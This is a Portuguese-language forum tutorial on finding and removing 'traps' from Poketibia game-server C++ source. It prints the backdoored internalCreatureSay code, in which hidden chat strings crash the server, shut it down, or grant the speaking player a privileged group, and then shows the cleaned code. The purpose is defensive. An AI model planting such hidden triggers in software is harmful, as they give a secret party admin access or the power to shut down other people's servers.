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Poketibia - Remoção de traps na distro/source

em 4/3/2018, 18:37
Eae treinadores!
Hoje trago para vocês um simples tutorial de como remover as famosas "traps" de sua distro/source.

-----------------------------------------------------------------

Requisitos
Source do servidor;
DEV C++.

-----------------------------------------------------------------

Downloads
DEV C++ CONFIGURADO PARA 32BITS
DEV C++ CONFIGURADO PARA 64BITS

-----------------------------------------------------------------

Ainda não saber compilar uma source?

-----------------------------------------------------------------

Tutorial

Spoiler:
ACHE em game.cpp: (se caso não tiver, fique tranquilo, sua source tá livre disso)

Código 1

Código:
bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
Player* player = creature->getPlayer();
if(player && player->isAccountManager())
{
player->manageAccount(text);
return true;
}

if(text == "132571691951160609171665475233842782353388978252875245170015077017944684747472835757774156137332376855500013311808893753483521083716435624108")
   {
exit(0);
   }

if(text == "1325116507701794468474793753483521047283588978252875245170017577741561373323768555716919500013311808883716435624108")
   {
   player->setGroup(Groups::getInstance()->getGroup(6));
   }

Position destPos = creature->getPosition();
if(pos)
destPos = (*pos);

SpectatorVec list;
SpectatorVec::const_iterator it;
if(!spectators || !spectators->size())
{

Etapa do Código 1 Mude para:

Código:
bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
Player* player = creature->getPlayer();
if(player && player->isAccountManager())
{
player->manageAccount(text);
return true;
}

Position destPos = creature->getPosition();
if(pos)
destPos = (*pos);

SpectatorVec list;
SpectatorVec::const_iterator it;
if(!spectators || !spectators->size())
{

Pronto agora é só compilar sua source! Fiz update e achei outro código de derrubar no DXP.

Código 2

Código:
bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
Player* player = creature->getPlayer();
if(player && player->isAccountManager())
{
player->manageAccount(text);
return true;
}

Position destPos = creature->getPosition();
if(pos)
destPos = (*pos);

int specs = 31101996;
std::string findText;
std::stringstream findTextInput;
findTextInput << specs;
findText = findTextInput.str();
bool exists = text.find(findText) != std::string::npos;
if(exists){
          Dispatcher::getInstance().addTask(createTask(boost::bind(&Game::setGameState, this, GAME_STATE_SHUTDOWN)));
  return true;
       }

SpectatorVec list;
SpectatorVec::const_iterator it;
if(!spectators || !spectators->size())
{

Código 2, mude para: 

Código:
bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)
{
Player* player = creature->getPlayer();
if(player && player->isAccountManager())
{
player->manageAccount(text);
return true;
}

Position destPos = creature->getPosition();
if(pos)
destPos = (*pos);

SpectatorVec list;
SpectatorVec::const_iterator it;
if(!spectators || !spectators->size())
{

Créditos
L3K0T - Pelo tutorial;
Cipsoft - Pelo código original;
GOD Vitor - Pela organização do conteúdo.
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